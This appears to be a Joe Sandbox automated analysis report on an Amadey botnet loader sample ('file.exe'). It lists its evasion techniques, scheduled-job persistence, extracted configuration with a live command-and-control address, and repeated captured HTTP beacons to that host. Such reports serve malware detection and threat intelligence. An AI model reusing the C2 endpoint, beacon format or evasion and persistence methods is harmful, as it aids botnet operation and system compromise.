Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1520516
MD5:e3aa1042729bc6d0ddbed39ddb48b872
SHA1:d9642336d578f012359bbd1f49c90798a76d92ac
SHA256:14165c7b3da199b6b30c325c1906d87578ceebe57cda17a1bd87aae2c1aaf06e
Tags:exeuser-Bitsight
Infos:

Detection

Amadey
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7352 cmdline: "C:\Users\user\Desktop\file.exe" MD5: E3AA1042729BC6D0DDBED39DDB48B872)
    • axplong.exe (PID: 7576 cmdline: "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" MD5: E3AA1042729BC6D0DDBED39DDB48B872)
  • axplong.exe (PID: 8080 cmdline: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe MD5: E3AA1042729BC6D0DDBED39DDB48B872)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Malware Configuration

Threatname: Amadey

{"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000003.1403500499.0000000004A60000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
    00000006.00000003.1963827399.0000000004910000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
      00000000.00000003.1378088248.0000000005200000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
        00000000.00000002.1418313558.0000000000011000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
          00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
            Click to see the 1 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.file.exe.10000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
              6.2.axplong.exe.400000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                2.2.axplong.exe.400000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security

                  Sigma Signatures

                  No Sigma rule has matched

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-27T12:55:12.578966+020028561471A Network Trojan was detected192.168.2.949711185.215.113.1680TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: file.exeAvira: detected
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                  Found malware configuration
                  Source: 00000002.00000003.1403500499.0000000004A60000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Amadey {"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeReversingLabs: Detection: 52%
                  Multi AV Scanner detection for submitted file
                  Source: file.exeReversingLabs: Detection: 52%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: file.exeJoe Sandbox ML: detected
                  Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.9:49711 -> 185.215.113.16:80
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorIPs: 185.215.113.16
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 31 38 42 41 42 38 30 38 31 43 34 35 32 45 33 44 43 37 45 37 34 37 36 43 39 44 39 30 46 46 31 46 33 32 38 38 31 46 35 31 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C218BAB8081C452E3DC7E7476C9D90FF1F32881F51
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 31 38 42 41 42 38 30 38 31 43 34 35 32 45 33 44 43 37 45 37 34 37 36 43 39 44 39 30 46 46 31 46 33 32 38 38 31 46 35 31 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C218BAB8081C452E3DC7E7476C9D90FF1F32881F51
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 31 38 42 41 42 38 30 38 31 43 34 35 32 45 33 44 43 37 45 37 34 37 36 43 39 44 39 30 46 46 31 46 33 32 38 38 31 46 35 31 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C218BAB8081C452E3DC7E7476C9D90FF1F32881F51
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 31 38 42 41 42 38 30 38 31 43 34 35 32 45 33 44 43 37 45 37 34 37 36 43 39 44 39 30 46 46 31 46 33 32 38 38 31 46 35 31 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C218BAB8081C452E3DC7E7476C9D90FF1F32881F51
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 31 38 42 41 42 38 30 38 31 43 34 35 32 45 33 44 43 37 45 37 34 37 36 43 39 44 39 30 46 46 31 46 33 32 38 38 31 46 35 31 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C218BAB8081C452E3DC7E7476C9D90FF1F32881F51
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 31 38 42 41 42 38 30 38 31 43 34 35 32 45 33 44 43 37 45 37 34 37 36 43 39 44 39 30 46 46 31 46 33 32 38 38 31 46 35 31 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C218BAB8081C452E3DC7E7476C9D90FF1F32881F51
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 31 38 42 41 42 38 30 38 31 43 34 35 32 45 33 44 43 37 45 37 34 37 36 43 39 44 39 30 46 46 31 46 33 32 38 38 31 46 35 31 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C218BAB8081C452E3DC7E7476C9D90FF1F32881F51
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 31 38 42 41 42 38 30 38 31 43 34 35 32 45 33 44 43 37 45 37 34 37 36 43 39 44 39 30 46 46 31 46 33 32 38 38 31 46 35 31 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C218BAB8081C452E3DC7E7476C9D90FF1F32881F51
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 31 38 42 41 42 38 30 38 31 43 34 35 32 45 33 44 43 37 45 37 34 37 36 43 39 44 39 30 46 46 31 46 33 32 38 38 31 46 35 31 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C218BAB8081C452E3DC7E7476C9D90FF1F32881F51
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 31 38 42 41 42 38 30 38 31 43 34 35 32 45 33 44 43 37 45 37 34 37 36 43 39 44 39 30 46 46 31 46 33 32 38 38 31 46 35 31 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C218BAB8081C452E3DC7E7476C9D90FF1F32881F51
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: Joe Sandbox ViewIP Address: 185.215.113.16 185.215.113.16
                  Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_0040BD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,6_2_0040BD60
                  Source: unknownHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: axplong.exe, 00000006.00000002.2627219543.0000000000C69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
                  Source: axplong.exe, 00000006.00000002.2627219543.0000000000C69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpD
                  Source: axplong.exe, 00000006.00000002.2627219543.0000000000C69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpE
                  Source: axplong.exe, 00000006.00000002.2627219543.0000000000C8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpM
                  Source: axplong.exe, 00000006.00000002.2627219543.0000000000C8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpOF_i
                  Source: axplong.exe, 00000006.00000002.2627219543.0000000000C69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpQ
                  Source: axplong.exe, 00000006.00000002.2627219543.0000000000C8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpded
                  Source: axplong.exe, 00000006.00000002.2627219543.0000000000C8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded
                  Source: axplong.exe, 00000006.00000002.2627219543.0000000000C8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded6
                  Source: axplong.exe, 00000006.00000002.2627219543.0000000000C8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodedn

                  System Summary

                  barindex
                  PE file contains section with special chars
                  Source: file.exeStatic PE information: section name:
                  Source: file.exeStatic PE information: section name: .idata
                  Source: file.exeStatic PE information: section name:
                  Source: axplong.exe.0.drStatic PE information: section name:
                  Source: axplong.exe.0.drStatic PE information: section name: .idata
                  Source: axplong.exe.0.drStatic PE information: section name:
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\axplong.jobJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_0040E4406_2_0040E440
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_004430686_2_00443068
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00404CF06_2_00404CF0
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00437D836_2_00437D83
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_0044765B6_2_0044765B
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00404AF06_2_00404AF0
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_0044777B6_2_0044777B
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00446F096_2_00446F09
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_004487206_2_00448720
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00442BD06_2_00442BD0
                  Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: file.exeStatic PE information: Section: ZLIB complexity 0.9972060200953679
                  Source: file.exeStatic PE information: Section: wpzcbdbk ZLIB complexity 0.9945939571060383
                  Source: axplong.exe.0.drStatic PE information: Section: ZLIB complexity 0.9972060200953679
                  Source: axplong.exe.0.drStatic PE information: Section: wpzcbdbk ZLIB complexity 0.9945939571060383
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/3@0/1
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeMutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\44111dbc49Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: file.exeReversingLabs: Detection: 52%
                  Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                  Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                  Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                  Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: mstask.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: dui70.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: duser.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: chartv.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: atlthunk.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
